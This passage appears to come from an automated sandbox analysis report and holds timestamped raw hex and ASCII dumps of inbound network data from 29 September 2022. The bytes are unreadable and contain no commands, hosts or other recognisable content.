                                                                                                                                                            2022-09-29 12:45:02 UTC7635INData Raw: a6 d1 77 a2 cc 36 24 b5 fe 40 2d 92 69 0b 09 65 b2 57 d7 1a fd b2 f9 29 43 8b cb 2b 78 22 ef 6a ac 7b d6 df f0 d5 24 f4 df 00 6a c3 b6 10 e2 6b 07 87 19 39 f8 08 27 e9 e1 1c 3a 1a 09 64 d0 38 87 af 25 85 37 27 42 d6 b7 b9 87 69 7e 52 86 49 7b 23 63 1a 04 52 bc 99 51 70 b0 34 e4 ab 36 f8 99 92 9a ea b8 b7 44 0d 5b 61 63 fb e8 a8 8b 63 c6 87 aa 16 a3 4f 3f 74 0c 61 5b d5 58 0d 6a 66 4d 45 7f dd 48 ce c3 b2 ea 0a 6c cc b1 a7 98 88 b1 81 85 4f 3d 5c 19 9c 35 a1 39 28 8e 5e 76 7b ae db 0b ee ae ec d2 8c a3 92 c9 f4 17 89 78 9b cc fe 08 ae d4 31 a5 00 45 26 18 3b 7a 09 ea 06 5f f3 c7 05 95 d2 4f 44 63 47 33 d8 9d ad a0 b7 97 53 82 a2 0d 2d 0e 54 70 80 a8 58 cc c5 bf 07 4c 81 20 f0 0d 90 48 e6 dc 79 c2 d1 d3 a0 51 14 a9 92 9b 88 98 3d 51 51 64 bc f9 2e 1b b2 61
                                                                                                                                                            Data Ascii: w6$@-ieW)C+x"j{$jk9':d8%7'Bi~RI{#cRQp46D[accO?ta[XjfMEHlO=\59(^v{x1E&;z_ODcG3S-TpXL HyQ=QQd.a
                                                                                                                                                            2022-09-29 12:45:02 UTC7651INData Raw: b2 cf 49 c3 6e f0 2f 48 af df 8c 32 59 87 d5 2a db 5d 55 e4 58 8b 37 e4 9d 56 72 a3 13 9b 7c fb 24 62 2f d6 eb 93 f4 b3 fe 57 30 b8 ab 22 24 e4 1b f8 7c 2b 5b 27 a3 e7 86 50 f0 4c fd 84 cf 2f 6f cc ad 99 48 f8 45 a1 e8 f8 ed 68 4d 98 65 c6 5e 67 8b 7f a2 86 da ef b2 43 33 f8 90 56 92 9c a1 62 d4 7a ab 3c 96 45 b3 9c dc 6d fc ca 5c c5 d0 d4 8c 2d 73 5d f2 e7 b5 77 a3 f5 b0 a0 a8 85 66 2c dd bd 95 ea 09 66 4e e8 7b 21 c9 c0 77 0b da d9 22 66 08 8a f2 88 d6 03 19 92 01 c5 a0 37 b1 8f 97 34 55 a9 78 58 61 7d 09 58 8d 9f c6 dd 11 a1 d5 e8 b4 e8 2a f3 4f c7 1e c7 dd 33 25 ce 72 14 72 20 bc be 4a 50 19 16 18 ef 39 40 f0 9a bb 9a 93 73 e0 15 df 2b 04 f0 77 2b a1 b7 f0 e0 a6 ff 63 63 7e 62 92 81 ac 50 73 46 df 38 3d bd 76 1f 76 8e d5 5e 1e 18 57 df 90 93 62 7b f6
                                                                                                                                                            Data Ascii: In/H2Y*]UX7Vr|$b/W0"$|+['PL/oHEhMe^gC3Vbz<Em\-s]wf,fN{!w"f74UxXa}X*O3%rr JP9@s+w+cc~bPsF8=vv^Wb{
                                                                                                                                                            2022-09-29 12:45:02 UTC7667INData Raw: e9 3f fc a6 db 85 26 dc 10 b8 31 b1 54 72 25 9f 6c b9 e3 54 76 67 9b 54 94 3d ef a1 49 90 cf be fa 2a 9b 7e 71 dc 61 50 05 c6 65 e7 4a 52 73 fd 5a d6 bf b9 02 f4 a4 05 af 47 21 5a 15 cb 26 57 16 93 21 4f ec 65 41 2f 75 57 16 9b d9 a3 6c 32 44 d1 44 cb c1 2a 36 25 30 37 cb ca 91 11 af e3 53 b8 73 42 8c 09 c1 18 78 38 c6 50 90 5e 3b 48 d9 17 f7 ae 3d c6 a8 a1 fd cb 4f 5b 33 a8 67 5e 48 ce f4 70 d6 b0 26 d7 0a 8a 53 ce db 43 83 98 69 4f 93 b9 d4 28 0f 5c b3 fe 11 f8 a4 da d0 f1 eb 70 4f 8b 3f a7 ce 41 ec a2 bf f3 3a 2b 68 74 be 55 ad e6 3e 0d 35 ea e2 64 b1 28 4c 1e 10 e2 52 b2 d9 2f 3b 13 3d 4c 67 0d 8e 70 86 03 b3 67 24 79 8c 92 e3 06 2e ad cd 18 c0 de 47 80 d8 0d 96 c0 b8 28 59 e2 3a 4a ab fd 8d 7b 56 92 0e 88 c3 0e ac 8f 0b 84 d5 be d0 3f 51 f1 04 05 cf
                                                                                                                                                            Data Ascii: ?&1Tr%lTvgT=I*~qaPeJRsZG!Z&W!OeA/uWl2DD*6%07SsBx8P^;H=O[3g^Hp&SCiO(\pO?A:+htU>5d(LR/;=Lgpg$y.G(Y:J{V?Q
                                                                                                                                                            2022-09-29 12:45:02 UTC7683INData Raw: 7e 50 18 f1 ed 79 ec e3 e3 63 33 43 f2 c8 1e 60 1a 27 5f 6e 6d 39 f8 39 9c 01 61 b9 23 e0 53 e5 ba a8 67 c6 7b 34 18 02 9f eb 1b c6 e4 cd 7c 7e 63 59 04 32 86 00 0f 1d 3f af 4e 57 a1 c0 70 fc 39 05 5d f6 e2 6b 8c 78 2a 0d 0a de 6b 26 a4 da 5c 71 92 f8 0a 3b 5d 10 29 d1 66 01 6e b9 0b 3b 24 90 10 77 51 67 85 b4 c6 8f e5 3c 95 eb 51 59 37 d8 69 cb 1c 95 2e 4e f4 2b fa af d8 65 dc 1a 78 76 c8 b4 7b 7b 2b d9 82 86 dd 32 38 54 a7 03 25 5c 8f 04 3a 23 63 52 23 c1 d6 65 01 da b0 90 a5 e1 b8 90 83 69 7a 4a ac d5 c6 4d fb 66 6e 98 ea 83 66 3f 94 e9 0c 27 cc 58 3e 6d 52 ba 42 1f 7e 5c d5 64 aa 39 f0 aa 54 3f 0b b2 58 86 d8 42 2c 60 3a bd 03 02 79 63 3b 04 60 c4 e3 46 a7 35 4d 5d 35 c9 8f 76 9c ce fc 39 65 e9 40 a2 d4 30 1a 32 4f 8c 2e 17 c5 23 2b 17 db 51 d3 13 a2
                                                                                                                                                            Data Ascii: ~Pyc3C`'_nm99a#Sg{4|~cY2?NWp9]kx*k&\q;])fn;$wQg<QY7i.N+exv{{+28T%\:#cR#eizJMfnf?'X>mRB~\d9T?XB,`:yc;`F5M]5v9e@02O.#+Q
                                                                                                                                                            2022-09-29 12:45:02 UTC7699INData Raw: ed 2c ac 5d 82 38 2c 1d 97 67 25 31 a6 1b 96 38 c1 4a 3c 32 49 fa 80 60 79 1d 73 a0 6b bd 0d ef 05 bf 2e 3d 5f c4 bf 27 1e 11 04 84 d5 8d b2 32 a3 79 ca 2e df 4a de fa 12 7b 36 1b 57 f6 54 ca d5 b0 c4 5b 09 2f 29 bb 4d 5f 50 1d 21 db 78 ae 2e a1 71 e9 af 85 ba 52 41 1c 47 82 c5 13 22 11 5c 83 66 12 ca dd fc 74 f3 12 5e 4c 16 29 a2 45 37 86 53 05 94 85 6b cc 92 1b 4b c1 80 4a ef 45 2c b4 3b 21 d7 41 86 b1 d9 22 7d c4 59 a1 bd b3 72 4d df e6 d6 13 b0 b5 91 79 e6 f0 60 19 e0 10 b5 2d ce fa 42 4f 90 cf 95 90 88 82 7d 47 fb af 14 8e 62 89 58 fd df 36 8a e5 45 30 99 e6 48 f2 46 5a b5 48 03 f5 5a d9 7e 85 a0 04 5f cf ac b8 43 2d c7 13 98 f2 56 fe cb 20 74 a7 b6 28 52 1c 2f b7 40 7c 41 8c 2a a5 8b 6c 8c c7 6b b3 e5 de 61 44 74 40 58 f5 1a b1 98 14 ac db a8 13 d5
                                                                                                                                                            Data Ascii: ,]8,g%18J<2I`ysk.=_'2y.J{6WT[/)M_P!x.qRAG"\ft^L)E7SkKJE,;!A"}YrMy`-BO}GbX6E0HFZHZ~_C-V t(R/@|A*lkaDt@X
                                                                                                                                                            2022-09-29 12:45:02 UTC7715INData Raw: cc 9e 4b 3f ea 93 1a 50 81 21 f5 42 c6 83 9d ca 9e 88 52 80 a0 51 99 d8 ad de 9d 07 21 8c 17 ed 94 7d 73 d2 81 39 3d 53 09 9f b5 e8 c4 bb 0d d6 4f 18 3f 93 8b 2c 97 1e 34 1c bb 67 3d 6e c6 ad 50 44 b7 e3 be 7e 3e 00 88 b5 ee 40 11 61 03 d3 d7 78 e8 57 4c d4 b9 7d 33 6f 32 60 0c 1a 10 5c 17 75 48 05 6d 9e b7 98 e7 5e 68 11 ce c5 52 f8 9b 1b 1b c7 17 af 9d bc 45 f5 8e 83 b6 4b 98 3f 63 0f 01 bb 0e 3d 2e 83 59 40 19 c6 3d ef 24 17 f4 62 51 b5 93 d9 0a eb c2 71 94 33 eb 29 23 ce 7c 87 0f 10 19 bc 01 5d c4 18 e0 2f 92 d3 73 bd 66 6b 4d 71 37 7e bd 63 41 36 7e 4f 0f 6a 43 79 ec e8 00 fe eb 0d 87 a1 3f e6 d4 31 4f f6 e5 8c 41 e9 40 c8 cb 09 d3 54 8c 56 d4 d2 ad 61 3e 7e 82 1c 4c 69 74 65 d7 d3 21 f1 53 51 b2 10 92 a6 6a b4 1c fc 7c 97 30 bc bb 3d b1 e3 a6 be 4a
                                                                                                                                                            Data Ascii: K?P!BRQ!}s9=SO?,4g=nPD~>@axWL}3o2`\uHm^hREK?c=.Y@=$bQq3)#|]/sfkMq7~cA6~OjCy?1OA@TVa>~Lite!SQj|0=J
                                                                                                                                                            2022-09-29 12:45:02 UTC7731INData Raw: 42 96 83 f2 ef 24 9a 23 bd ed 4c 1f f4 d7 a3 86 2d 5e b3 53 83 88 1a 78 a7 0b af 9b 0a 15 e4 30 35 28 65 1e cd 7c 18 58 48 5b d8 8c a0 dd e7 63 c6 e9 27 86 99 cc 86 be b9 a0 81 58 48 48 ce 4c 40 73 af 3b b1 7d 5d f7 bf 6c b3 ce 4b 9d fd 0d 2a 88 c9 9c c6 1b f7 44 5f 4c bc 89 60 44 2c 6d 7d e9 11 29 70 fe 44 20 b0 7e a0 ef 6a 14 7e 4a 1a 62 79 8f 27 b6 c8 11 58 8e 49 d5 59 16 6c 43 ad fe 11 4a 02 c7 a7 ab ed 1e 29 16 33 63 2d db b7 3d 91 43 94 77 da 63 84 97 7f 0f bc 96 ac d1 28 1a b7 3b 88 c7 7f 3a 6c 52 7a 22 a6 3c cd b0 1f cd 8c ea c6 4f 0c dc 05 fb 5f db aa 18 00 5d 21 a2 05 f4 58 8f de ad 02 0e ed 62 83 90 7f 39 40 0a a2 2d 8b 54 77 0b 7e 47 b2 79 06 cd e9 cd 54 6a a0 a9 38 6e 78 55 8a a4 b7 f0 67 e8 8c a1 00 f7 60 c3 c8 dd 45 6a ed 53 80 39 37 a7 47
                                                                                                                                                            Data Ascii: B$#L-^Sx05(e|XH[c'XHHL@s;}]lK*D_L`D,m})pD ~j~Jby'XIYlCJ)3c-=Cwc(;:lRz"<O_]!Xb9@-Tw~GyTj8nxUg`EjS97G
                                                                                                                                                            2022-09-29 12:45:02 UTC7747INData Raw: f8 b1 20 79 03 f0 41 62 b0 e7 ee 80 e8 1c 9f 41 da 30 5a 65 c7 61 ec 36 3d 57 4d f3 23 76 20 02 8e d2 72 71 ca de f5 9d da 79 34 fb 6f 45 da 8e b4 4a 58 77 9d e3 fb 08 aa 5c 47 e9 dc e1 13 6f 41 a5 34 eb fc 29 d6 5b 24 8a cc ce a8 3d bb c0 c6 57 82 70 dc 63 98 db b9 50 db 7c 09 24 78 9c 2d bb 5b bb 98 7d 5f 27 26 04 b3 bb c8 1b c6 f2 7d 0f 28 06 75 7c 31 ed f2 9a ae e4 4f e6 37 e1 77 6c 1c 50 cf 3c 05 11 3d 77 c3 50 69 17 43 c5 36 7e 0b 12 2e c2 cd 40 ce eb 80 be d7 7d 61 27 06 e1 dc a4 7b 4a 2e cc 39 6f 0f 4d f4 37 1d 10 58 c8 38 d7 ae 71 a5 50 b2 03 7a 3b 6a 56 84 1b 3e 2d 4c 3a e4 90 ea da 8e 66 0d 5a 74 2e 2d 73 72 0f b3 22 8e fa 1a 91 30 0e 67 3a d9 fe 2c a2 f9 8d 19 7f 05 83 f7 6b 54 2a 35 01 98 c1 d0 6f 5c 8c 98 26 29 2c ae 21 ff bb 42 e6 63 18 8a
                                                                                                                                                            Data Ascii: yAbA0Zea6=WM#v rqy4oEJXw\GoA4)[$=WpcP|$x-[}_'&}(u|1O7wlP<=wPiC6~.@}a'{J.9oM7X8qPz;jV>-L:fZt.-sr"0g:,kT*5o\&),!Bc
                                                                                                                                                            2022-09-29 12:45:02 UTC7763INData Raw: e9 41 c4 c9 43 a0 df 4e 78 06 cb c5 67 89 72 3b af f6 e3 be b0 7a b6 1c 7c 63 e0 69 59 93 7e 56 b5 3b dc e2 18 7c 05 89 e3 9f 68 36 5f c9 29 56 b5 7d cd c1 e1 a2 01 d0 4f de 2a b0 b6 1e 0f 4b 46 b1 d2 f1 39 9c 85 99 a9 8d d9 43 1e 37 1c cb ef bc 99 53 69 d6 3c f7 a6 54 9c 3f 25 9a 76 90 54 15 1e 80 de bb 89 31 ae 40 99 d9 89 f0 da 0b 4b d1 6f 67 fa ae 4c 4f 2f 7f 72 f9 12 0a b2 ad fa aa b2 42 77 87 75 99 bf 39 b6 2c e6 07 4a fc e1 c1 30 90 dd 0b 9f e9 d9 ce ce db 1b a1 e5 ee 4a cd ca ef e8 91 0a 15 c6 a0 bb 23 01 7a 8e ef 4b 8e 51 87 a0 46 46 ec f0 ea 6c 78 62 24 69 1c a2 2e af 51 76 19 c9 57 26 3b 5f e6 b9 49 1a 2f 21 64 fb 0e 87 4b e4 b2 d2 18 b2 59 5f c8 75 13 e8 4a a7 83 bb 75 e1 97 70 7f 0b 1e 06 83 96 2c 42 fc 3d d1 6b d1 19 d8 0e 2d 5e 5b cf 89 99
                                                                                                                                                            Data Ascii: ACNxgr;z|ciY~V;|h6_)V}O*KF9C7Si<T?%vT1@KogLO/rBwu9,J0J#zKQFFlxb$i.QvW&;_I/!dKY_uJup,B=k-^[
                                                                                                                                                            2022-09-29 12:45:02 UTC7779INData Raw: 1e 2f 5f 54 f0 86 7e cb 29 0e 96 1f 88 49 9d 1e 1a 3e d5 f3 b8 32 9a 2b 49 43 4f c3 a9 c2 69 f3 a2 34 0b c8 51 25 1f 0e 99 d9 35 bd 60 b3 7a 83 a2 4a ce 00 3c 21 ee 24 eb 48 3f 5a a4 88 20 8b 8f 9a 28 a9 e6 c4 6c 8c 55 3c 8d ff e8 72 a0 e0 6f 11 c7 2a e3 69 05 37 86 4c 67 a3 2e 2b f4 56 f0 c9 12 9b 95 5b d4 df 1f 74 14 c8 45 83 f9 f7 ab 14 ec 24 75 31 21 10 5a 59 de aa 58 0d 36 c5 d8 9b 40 f8 0c 00 42 ff 93 81 4d 8b 9e da f9 e6 19 d1 f9 72 8e e9 e6 c5 49 a8 94 a9 4b ab 10 6f 8f 23 d0 c8 36 7f be 4c e4 f5 62 70 b0 b5 05 5a 66 b8 17 21 fa 37 8c eb 48 46 6e af 66 b5 11 5b 9d cd e1 bf 93 f3 bb 68 1e 21 81 49 05 12 36 b0 47 1e 34 2d c6 65 7c 94 13 68 27 60 43 1b 5b ce c6 5a b2 c4 97 86 a5 9b 0d 36 ab 06 08 a0 b0 ac e9 ac 5e 31 1c 16 d9 7c ad f6 26 51 39 a7 ca
                                                                                                                                                            Data Ascii: /_T~)I>2+ICOi4Q%5`zJ<!$H?Z (lU<ro*i7Lg.+V[tE$u1!ZYX6@BMrIKo#6LbpZf!7HFnf[h!I6G4-e|h'`C[Z6^1|&Q9
                                                                                                                                                            2022-09-29 12:45:02 UTC7795INData Raw: 61 09 c1 f2 79 5a 94 88 e3 10 14 e7 e0 aa 19 9e 07 95 4e 0f e1 1a aa 53 9b 28 63 b5 d6 42 e9 79 0f d3 3c 9b ba f1 b6 29 fd 77 fe 43 bf fa 2d 52 0a 10 d6 14 3d ad 00 1a 2e 59 25 3a f7 a1 38 c3 df 2d a7 f1 e5 34 4a b8 10 96 1e 4d cf 2d f0 44 06 58 53 01 d7 0e 20 8b ca 8b 8b e4 07 23 c2 83 c4 12 f7 37 12 d9 a8 33 c8 e1 ec be 82 45 b7 c0 d4 0c 82 77 86 5f a4 41 11 17 fe 35 8c 90 91 2c 95 96 90 e4 29 c5 e6 11 4c 86 fd c3 ad 2b bc dc 41 f1 cc c1 b2 b1 49 71 a8 57 5a aa 9f af c3 59 39 ef bc 38 ed ac 05 20 9f ee 25 85 e5 d9 f6 66 01 15 67 b0 1d 06 f3 35 19 57 f8 ac 65 0a 8b 47 5d 2d ba 0a 56 08 47 b3 08 71 7d 3f 6f 6c 3e 80 84 06 e3 2b 7a a2 bb 4a 43 ce f7 f4 97 c1 a0 7c 45 a1 6b 7c 90 b2 db 77 8c c9 1e ee 9a df 78 46 16 e0 2a 09 43 af ee 7f ce b7 b2 94 89 10 51
                                                                                                                                                            Data Ascii: ayZNS(cBy<)wC-R=.Y%:8-4JM-DXS #73Ew_A5,)L+AIqWZY98 %fg5WeG]-VGq}?ol>+zJC|Ek|wxF*CQ
                                                                                                                                                            2022-09-29 12:45:02 UTC7811INData Raw: 70 9b 0b 4a ca 86 9e 53 10 1f 8b d4 44 f5 1c 22 23 c0 04 96 54 1e 19 67 3c 04 51 44 d5 9a 76 05 5b 25 41 49 e6 e5 73 91 43 29 1c 0e 1b d4 3b fc b5 bc bd 9b b8 01 c9 65 1e 46 68 0a 89 ca 43 ce 83 28 1d 16 5b ea 6e bf 6d b2 fd 80 6b 42 c4 81 24 1f 48 4a bc 55 eb 4d 31 ac 36 f4 ae 34 1f 38 60 e3 74 17 d7 3b 9c 2d e6 21 dd 4f c7 88 38 a7 f4 14 50 cc 5b df cd 19 39 8e 35 b1 9f 5f 81 96 0f 7d 28 63 2c 73 5c ca 91 f4 62 1b b0 c0 2a 1b ba 92 63 13 eb 80 ba 34 2f 0f e3 e2 63 a1 43 70 0c da 2e a4 6a 23 22 18 8d 16 7b c4 b1 52 e5 3d 97 ab 60 83 7b b7 91 90 8e 84 ab 11 75 7e a8 48 56 f4 72 0b e0 cb b1 bb 46 dd b8 7e b3 8d e4 a2 1b 4f 61 82 19 0f 52 08 e7 74 23 92 1c 54 db 5f d6 32 ec 1b c6 44 4d a7 fa dd 14 d2 d8 24 92 58 07 83 ef b2 ef ec b8 dc b6 15 6c c8 71 c6 4b
                                                                                                                                                            Data Ascii: pJSD"#Tg<QDv[%AIsC);eFhC([nmkB$HJUM1648`t;-!O8P[95_}(c,s\b*c4/cCp.j#"{R=`{u~HVrF~OaRt#T_2DM$XlqK
                                                                                                                                                            2022-09-29 12:45:02 UTC7827INData Raw: 6e 18 88 1f 51 53 6c 0a c3 58 c3 54 86 19 b3 cc 87 01 80 4c e2 05 cf 85 74 e2 55 af b4 87 7f 2e 84 b7 55 02 c0 83 2e 63 0b 31 0d 7b 91 d0 42 95 82 23 ad bc 7e e1 96 c2 f3 5a 8d 67 bd 04 a2 05 95 79 02 d0 18 1d 48 16 66 0f 37 d1 bf 7b b9 87 37 dc 7c 11 2c ba d2 d4 57 c4 61 17 08 f6 f5 3a 3f 23 e9 45 b6 a8 f3 2d b6 91 68 78 62 23 24 a4 b1 69 02 cb 0b e9 f7 99 1a aa 94 6a 85 02 5a 44 4f 25 30 69 ba 2e d6 02 31 6d 88 1d 1e 60 21 55 b8 86 87 0b 76 54 cc cd 89 fb 51 a9 56 14 b3 16 db d2 8e 37 91 08 bc e5 69 53 94 a2 3c 3a 95 b4 66 f3 b1 ab 78 a9 50 f3 f3 a9 a0 87 9b e3 be ff d3 20 59 68 d2 23 f7 49 da f4 ad 87 4d 66 f6 ee a4 f8 75 08 ba ad 9d 40 08 f6 90 3a 30 13 da 72 be df df f2 0f 86 15 5b 38 f8 0f ab 2a 58 98 12 70 34 ec 48 43 dd fc f4 f9 33 55 60 cb c7 66
                                                                                                                                                            Data Ascii: nQSlXTLtU.U.c1{B#~ZgyHf7{7|,Wa:?#E-hxb#$ijZDO%0i.1m`!UvTQV7iS<:fxP Yh#IMfu@:0r[8*Xp4HC3U`f
                                                                                                                                                            2022-09-29 12:45:02 UTC7843INData Raw: 64 54 3e f3 ad 7c db a2 b7 11 a0 8f a2 63 d0 e2 6e 65 d0 63 ae dc 7e 59 19 be d7 0c d8 44 c3 34 f3 47 6b ce 54 a9 73 95 42 3a c3 13 bb 3a 6b e5 aa ec f2 00 fc 38 c1 5b 5f ad 61 0d f7 60 a3 29 03 39 cc 38 22 de 0e f9 ed e2 08 58 85 97 12 49 4e ae 5b 88 ea 86 e4 63 ec f7 98 3e 22 34 16 d7 bb ce 2b 3a dd 52 67 d1 9d eb 95 6b b0 af 1a f2 cf 6e 04 98 8c 63 28 f1 29 fc f3 dd 2f 80 0a 2e de 80 63 f3 dd a4 9e b2 d5 8a 2e 7b 17 ce f2 f2 cb de fb 24 2d 04 2a cf 2f 1e 7d 61 cf 6d 74 41 e4 0e 5d f1 50 c5 33 3b 65 6f de bb 2b c6 d9 ea 9f 82 26 16 58 45 93 1e f7 9e 2a 3f 0a 85 55 e2 e2 cb 2a cc 93 95 d1 a7 97 c2 6a d7 95 5e e1 26 da 78 97 f9 59 b4 8b b3 39 8e 48 fc 9a dd db 1a e0 3e ec ea b3 32 82 2d a5 91 9b 10 a2 a3 52 c0 4c 09 89 e2 c7 35 27 6b bc 00 19 2c 20 34 ac
                                                                                                                                                            Data Ascii: dT>|cnec~YD4GkTsB::k8[_a`)98"XIN[c>"4+:Rgknc()/.c.{$-*/}amtA]P3;eo+&XE*?U*j^&xY9H>2-RL5'k, 4
                                                                                                                                                            2022-09-29 12:45:02 UTC7859INData Raw: d7 e4 07 33 60 31 81 28 8d 71 17 19 ba d5 55 0b eb 0c 00 53 b5 55 4e 2e 10 04 1b 1d 9e 98 26 f9 77 bf db 7a c3 42 92 f0 71 17 aa c3 84 23 7a b0 29 85 af 22 d3 40 77 af 52 a4 5e 6c 56 f9 09 f4 30 07 aa 74 7b db 47 90 eb 97 2d fb b9 23 ff d5 a1 dd 0f a9 a1 23 d1 52 52 f6 1a 8e 55 9d fc c7 3b bc f9 86 ec 46 e7 b8 fa 4e ac eb a5 15 31 78 82 4a a8 3a 64 c7 52 09 97 a3 d3 5e 5c 2c 1f 5b ff a6 05 ca 81 c0 8b d6 34 1a 98 d5 0a 37 07 d2 9d 0b 00 fe a6 03 4e 4d 47 42 19 0f eb 8c 6e ba 49 72 56 3a 2e 1b b0 fd ca e9 76 d7 79 f3 f8 4a ce 32 fc 2d 27 8b 73 29 df ab 7f df 55 aa df bb 9f 2c f9 a6 d5 40 09 fb b3 58 a7 1e d3 f7 df e9 a4 5f 7f 00 7c 86 92 83 64 cc 03 9f 9c 9a 4f 07 b0 8b f5 95 7b 8a ab f9 1e 9b bb d1 04 54 06 e4 ec 92 17 fb c4 ae 3b cc f4 b0 6e 7b a5 48 c6
                                                                                                                                                            Data Ascii: 3`1(qUSUN.&wzBq#z)"@wR^lV0t{G-##RRU;FN1xJ:dR^\,[47NMGBnIrV:.vyJ2-'s)U,@X_|dO{T;n{H
                                                                                                                                                            2022-09-29 12:45:02 UTC7875INData Raw: f5 4a b6 7e a7 8e d6 ae 7c a9 eb 17 7e 1e 4d b3 e4 8d 1c f5 a6 25 46 11 51 44 28 8b 04 9f 29 9a 2b 38 32 10 2b b0 bb e6 da 1b 96 0a b9 b8 d5 85 e5 22 a6 96 5c 27 bd e8 fa 6b 11 70 45 d7 47 14 4b 10 3b bf 74 4d 52 25 07 f8 71 70 11 0d b4 6b 81 a6 9b d9 05 72 ad a0 ed ab 40 f8 c1 90 03 32 16 1e 5f 9c 3e a0 b0 55 0b 43 d2 b8 44 12 da f2 6c 29 6a 99 9b a4 51 8c ba 36 bf c9 3a e7 7d 7a b5 29 47 9c ab 34 d7 97 92 5d c0 d1 6b f6 58 f5 8e fa bb 0d 73 18 fe e5 1a ec 32 dd 28 1e c7 50 f2 a1 bd 02 5f a7 de e6 86 e6 05 ac 22 c7 b3 b9 fa 0b 56 01 bb 16 29 42 6f a3 ef f3 05 2b c5 24 ca aa 44 20 8f a2 55 06 bc 9a b3 f7 72 ed eb a8 26 e5 9e e3 cb be 67 24 d2 54 76 83 05 ca 26 cc 28 d8 92 79 6b c0 75 34 eb 93 08 b6 94 f5 aa 9c f2 4a 08 ff f7 a2 e1 00 97 08 1e 21 80 4c 4e
                                                                                                                                                            Data Ascii: J~|~M%FQD()+82+"\'kpEGK;tMR%qpkr@2_>UCDl)jQ6:}z)G4]kXs2(P_"V)Bo+$D Ur&g$Tv&(yku4J!LN
                                                                                                                                                            2022-09-29 12:45:02 UTC7891INData Raw: a5 7e 8a 9a c0 24 d7 c6 ab 8c 94 12 f0 5f d4 e5 af 01 fa 57 97 5e 1e a0 73 42 68 6c 8a 7b 45 e0 fa 01 8d 6a b3 c6 60 23 c2 36 e9 41 0f 6f f9 2c 98 78 9d 4f fd 43 cb 4e d0 cf 98 73 d3 ac 9c c1 5b e2 21 71 04 10 81 fb ed 79 18 56 34 fc c3 a0 f5 c0 50 f7 76 f9 48 9b 34 99 4f ed eb 10 ca 6e 2d df ac 50 76 1a 84 c8 de ae 14 a0 1c 6c b4 5f d1 1a 46 c2 1e 8b e7 32 ce dc ef 51 af 82 d5 b2 53 89 b5 15 a9 7e 0d 84 8b 2d 84 56 ec a2 03 22 de 89 93 10 f6 ad ba 33 db 56 ab 7f e6 26 26 ce 3a bc 17 c9 c0 db e2 1c 8d 0b b3 ee 61 8c 5e b8 90 2d ba b6 3f d4 0f 70 17 d2 34 89 29 26 82 4d d3 e3 9a f6 9a e0 b6 d0 86 a1 73 e7 96 bc c3 90 14 90 0b 80 4f ee 33 a7 49 56 c3 94 ea 93 73 bd 28 f5 5c be 43 96 cd 88 fe 51 e7 3b 46 a9 9a 87 6d 5d 0b 16 74 81 fb ae 7e 87 2a e6 b4 13 98
                                                                                                                                                            Data Ascii: ~$_W^sBhl{Ej`#6Ao,xOCNs[!qyV4PvH4On-Pvl_F2QS~-V"3V&&:a^-?p4)&MsO3IVs(\CQ;Fm]t~*
                                                                                                                                                            2022-09-29 12:45:02 UTC7907INData Raw: d9 a6 fd 9f 73 52 b7 af 6a 34 69 c3 53 f9 58 7b 4d 7a ff 59 46 4e 47 93 7c e3 a9 3a b5 92 68 41 c4 4b c4 23 42 68 e2 06 3a 13 c2 46 db f4 43 ab 84 9c a8 06 cd 2a 4d 55 4f ba 42 e8 7f 4d 8e 63 19 00 6b 83 d2 a4 3d 8c 2d 88 d7 39 f1 ed ba d8 31 98 2b 8d 43 d1 ed 65 bd ca 9b 48 7e 05 08 32 50 27 93 0a 45 43 c3 34 72 90 2e 83 28 a3 60 e2 4f 39 d5 43 7d 3a a7 5e c0 61 9a 81 ba 8b 54 5b 9b 4d 84 46 17 ce a3 43 99 20 68 c2 7c b0 7d d9 42 01 da 0b 48 06 d1 2b b1 0d 2e c1 1d ee c0 e9 53 3c fe 8b d4 78 c4 26 3d aa 0c c3 9c c2 92 fc 5c 8b 68 1c 0d e1 33 f5 36 0f f4 6e 36 38 26 d0 c2 f6 14 f9 1d 4a 42 39 5f c5 26 47 a5 fd d5 9e 09 6b f5 fb 62 40 cd 37 8f 22 ec e2 d4 77 e2 53 6c 55 58 51 74 09 42 cf 95 b5 3c 80 97 22 6a f8 5d 1a aa 66 ba 33 65 73 ca c2 dc bf 72 00 f6
                                                                                                                                                            Data Ascii: sRj4iSX{MzYFNG|:hAK#Bh:FC*MUOBMck=-91+CeH~2P'EC4r.(`O9C}:^aT[MFC h|}BH+.S<x&=\h36n68&JB9_&Gkb@7"wSlUXQtB<"j]f3esr
                                                                                                                                                            2022-09-29 12:45:02 UTC7923INData Raw: c1 00 f4 85 bd 94 cb a9 2d ef ed 7c 27 1b 4f 1c ac 25 c6 ee 77 eb 27 ff f0 55 54 e5 e1 ff 92 cc bf 90 6a c3 1f dc c8 24 a9 40 bf 6e 5f 64 bd 01 d9 78 5c 1d 57 2e ed 72 76 18 cc da f5 ae 1b 66 a2 6a 35 5b a2 e1 95 26 ad 48 f1 d8 6e 44 66 a7 ef 21 5d 11 47 1f 65 9a 62 f1 60 5a ff b2 7c 3c e0 90 5a 36 03 44 4d 68 50 f0 08 24 cb 39 b6 40 43 7e 43 4f c2 bb 3b 93 49 e1 cb e7 05 b6 47 1c c9 6a f9 f6 46 01 4c e8 a4 7b 28 68 ef ea e3 b2 50 0e 74 8d e4 84 ae 7f 51 a3 66 d9 02 0a 23 24 72 ac 07 d4 e1 d6 d5 ac cc 38 1c c8 e1 21 ac 81 67 b6 59 7e 84 05 85 dd 10 51 c9 3e 2b 0e 6f d4 07 9c 36 34 cc 92 42 20 15 81 22 64 f5 69 32 16 c8 ad b1 fc 49 ee 6b 8e ee 04 ac c4 8b 90 ba f1 c9 38 e9 28 97 3c 75 61 74 39 86 cb 11 85 31 51 c0 67 ef b6 a5 31 f0 27 79 28 6f c1 47 4a 7c
                                                                                                                                                            Data Ascii: -|'O%w'UTj$@n_dx\W.rvfj5[&HnDf!]Geb`Z|<Z6DMhP$9@C~CO;IGjFL{(hPtQf#$r8!gY~Q>+o64B "di2Ik8(<uat91Qg1'y(oGJ|
